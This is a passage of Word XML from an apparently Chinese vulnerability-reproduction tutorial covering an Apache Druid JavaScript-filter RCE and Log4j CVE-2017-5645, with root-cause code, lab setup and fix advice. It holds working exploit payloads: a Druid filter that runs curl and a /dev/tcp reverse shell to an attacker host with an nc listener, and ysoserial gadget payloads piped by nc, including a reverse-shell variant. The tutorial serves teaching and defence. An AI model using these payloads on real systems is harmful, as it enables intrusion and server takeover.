    <w:p w14:paraId="24E50848" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装Burp Suite、nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B76A5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78834C2A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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：进入数据加载向导</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DD840" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>访问http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://192.168.1.100:8888，点击Load data -&gt; Local disk，填写：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2DF156" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>Base directory: quickstart/tutorial/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13901ACE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>File filter: wikiticker-2015-09-12-sampled.json.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A610AE8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>点击Apply后，在Filter步骤添加一个selector过滤器（Dimension: cityName, Value: Auburn）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC375B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：拦截并修改请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C146610" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>点击Add前开启Burp Suite拦截，将请求中的filter字段替换为恶意JavaScript过滤器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C6302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"filter": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "type": "javascript",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "function": "function(value){return java.lang.Runtime.getRuntime().exec('curl http://192.168.1.200:8000/`id`')}",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "dimension": "added",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "enabled": "true"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2B8F0C7C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步骤三：反弹Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DEB2D6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将exec中的命令替换为反弹Shell命令，同时在攻击机启动</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F81A6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 xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>攻击机监听</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lvvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1234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# JavaScript函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>"function": "function(value){</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i &gt;/dev/tcp/192.168.1.200/1234 0&gt;&amp;1')}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399DA934" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7070F8F1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache Druid 0.20.1及以上版本。官方在该版本中修复了Jackson反序列化配置覆盖问题，确保JavaScriptConfig的enabled状态只能通过全局配置文件设置，不可被请求参数覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B3993" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 在Druid配置文件中显式设置druid.javascript.enabled=false，并确保该配置不可被运行时修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC9856" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>③ 限制Druid Console（8888端口）和API接口的访问来源，仅允许可信用户访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D1693" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>④ 若业务不需要JavaScript功能，可在JVM层面禁用脚本引擎（如Nashorn）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437DEA5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E65203B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第九章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Apache Log4j Server </w:t>
      </w:r>
      <w:r>
        <w:t>反序列化</w:t>
      </w:r>
      <w:r>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2017-5645</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48924B6E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F648631" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Log4j是Apache基金会旗下的Java日志记录框架，Log4j 2.x是其第二代版本，提供异步日志、自定义插件等高级特性。Log4j 2.x支持启动远程日志服务器（SocketServer），通过TCP或UDP接收来自其他应用的序列化日志事件。在Log4j 2.8.2以前的2.x版本中，SocketServer在接收网络数据后直接使用ObjectInputStream进行反序列化，未做任何类白名单校验，攻击者可发送恶意序列化对象，利用CommonsCollections等Gadget链执行任意命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7CC75D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 </w:t>
      </w:r>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F91227" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Log4j 2.x：2.0-alpha1 至 2.8.1（即&lt; 2.8.2）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A3411" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC381B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）TcpSocketServer的启动与监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25314C09" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Log4j 2.x的TcpSocketServer类实现了Runnable接口，用于启动一个TCP服务器监听指定端口（默认4712），接收客户端发送的序列化日志事件。其run()方法在循环中调用serverSocket.accept()等待连接，并为每个连接创建一个SocketHandler线程进行处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EC238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TcpSocketServer.run() 核心逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void run() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    while (isActive()) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Socket clientSocket = this.serverSocket.accept();  // 接受客户端连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 创建SocketHandler处理该连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        SocketHandler handler = new SocketHandler(clientSocket, this.logEventBridge);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Thread thread = new Thread(handler);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        thread.start();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55ADCD16" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）SocketHandler与ObjectInputStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1B0D1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>SocketHandler在构造时，将客户端Socket的输入流包装为ObjectInputStream。在其run()方法中，循环调用logEventBridge.logEvents(inputStream)方法处理日志事件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61090403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SocketHandler 构造与run方法（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public SocketHandler(Socket socket, LogEventBridge bridge) throws IOException {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    this.socket = socket;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // 直接将网络流包装为ObjectInputStream，无任何校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    this.inputStream = new ObjectInputStream(socket.getInputStream());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    this.bridge = bridge;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lastRenderedPageBreak/>
        <w:t>}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public void run() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        while (isActive()) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            // 调用桥接器处理反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            this.bridge.logEvents(this.inputStream);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    } catch (Exception e) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 异常处理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31EBC8DF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）反序列化触发点：ObjectInputStreamLogEventBridge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D85EE6D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ObjectInputStreamLogEventBridge是LogEventBridge的默认实现，其logEvents()方法直接调用ObjectInputStream.readObject()读取网络传入的对象：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56189626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// ObjectInputStreamLogEventBridge.logEvents() 核心代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void logEvents(InputStream inputStream) throws IOException, ClassNotFoundException {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    ObjectInputStream ois = (ObjectInputStream) inputStream;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        while (true) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            // 直接readObject，无类白名单校验！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            LogEvent event = (LogEvent) ois.readObject();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            // 处理日志事件...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            logger.log(event);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    } catch (EOFException eof) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 连接结束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084525BF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>这里的readObject()是整个漏洞的触发点。由于没有使用ObjectInputFilter进行类过滤，攻击者可以发送任意可序列化的对象，而不仅仅是LogEvent。当readObject()反序列化恶意对象时，如果类路径上存在CommonsCollections、CommonsBeanutils等Gadget链依赖，就会触发命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5C01D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）利用链：CommonsCollections5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40680D6C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>实际利用中通常使用ysoserial的CommonsCollections5 Gadget链。该链通过BadAttributeValueExpException -&gt; TiedMapEntry -&gt; LazyMap -&gt; ChainedTransformer -&gt; InvokerTransformer的调用链，在反序列化时调用Runtime.exec()执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7CFDC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# 生成命令执行Payload并通过nc发送到4712端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>java -jar ysoserial.jar CommonsCollections5 "touch /tmp/log4j-success" | nc target 4712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# 生成反弹Shell Payload（base64编码避免特殊字符问题）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lastRenderedPageBreak/>
        <w:t>java -jar ysoserial.jar CommonsCollections5 \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "bash -c {echo,&lt;base64_payload&gt;}|{base64,-d}|{bash,-i}" | nc target 4712</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E0CC7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（5）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D10D3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该漏洞是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经典的Java反序列化漏洞之一。其根本原因是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TcpSocketServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在设计时假设所有连接都是可信的日志客户端，因此直接使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ObjectInputStream.readObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()反序列化网络数据，未实现</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任何类白名单</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或反序列化过滤机制。当4712端口暴露给不可信网络时，攻击者只需发送一个恶意序列化对象即可获得服务器控制权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B4305" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="659704E2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub Log4j CVE-2017-5645环境，TcpSocketServer监听4712端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA34BC8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装ysoserial、nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F3743" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317C5B3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤一：生成并发送Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208655A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java -jar ysoserial.jar CommonsCollections5 "touch /tmp/log4j-success" | nc 192.168.1.100 4712</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47251B51" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：验证命令执行</w:t>
